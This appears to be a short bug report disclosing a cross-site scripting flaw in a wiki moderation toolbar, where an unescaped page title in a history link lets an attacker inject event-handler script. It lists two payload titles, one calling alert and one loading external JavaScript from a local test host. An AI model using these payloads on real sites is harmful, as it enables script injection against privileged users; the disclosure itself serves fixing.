The page title in the URL of the history link in the PageTriage toolbar is not URL encoded or escaped, allowing possible XSS.
Steps to reproduce:
# Create a page with the title: `"onmouseover="alert(0);""` (or create a title with a URL to external JS, i.e. `"onmouseover%3D"$.getScript('http://127.0.0.1/t.js')""`)
# With an account that can patrol pages, visit the page and open the info tab
# Hover over the "show full history" link